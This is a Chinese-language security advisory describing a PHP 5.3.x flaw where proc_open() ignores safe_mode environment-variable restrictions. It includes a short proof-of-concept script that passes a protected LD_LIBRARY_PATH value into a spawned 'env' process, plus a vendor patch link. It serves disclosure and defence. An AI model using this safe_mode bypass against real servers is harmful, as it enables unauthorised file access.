PHP proc_open()绕过safe_mode_protected_env_var限制漏洞

受影响系统:

PHP PHP 5.3.x

不受影响系统:

PHP PHP 5.3.1

描述:

PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。

PHP没有执行任何检查便允许传送对proc_open所指定的环境变量,这就忽略了safe_mode_allowed_env_vars和safe_mode_protected_env_vars设置。用户可以绕过safe_mode限制访问Apache UID可访问的任意文件。

测试方法:
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

 

<?
putenv("BLAHBLAH=123");
putenv("LD_LIBRARY_PATH=/no/way");
putenv("PHP_TESTVAR=allowed");
$env = array(‘BLAHBLAH’ => ‘123’, ‘LD_LIBRARY_PATH’ => ‘/no/way’,
‘PHP_TESTVAR’ => ‘allowed’);
$dptspec = array(0 => array("pipe", "r"),
                 1 => array("pipe", "w"));
$fp = proc_open(‘env’, $dptspec, $pipes, ‘./’, $env);
echo "<pre>";
while(!feof($pipes[1])) echo fgets($pipes[1], 1024);
fclose($pipes[1]);
echo "</pre>";
?>

建议:

厂商补丁:

PHP

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://svn.php.net/viewvc/?view=revision&revision=286360

发表评论?

0 条评论。

发表评论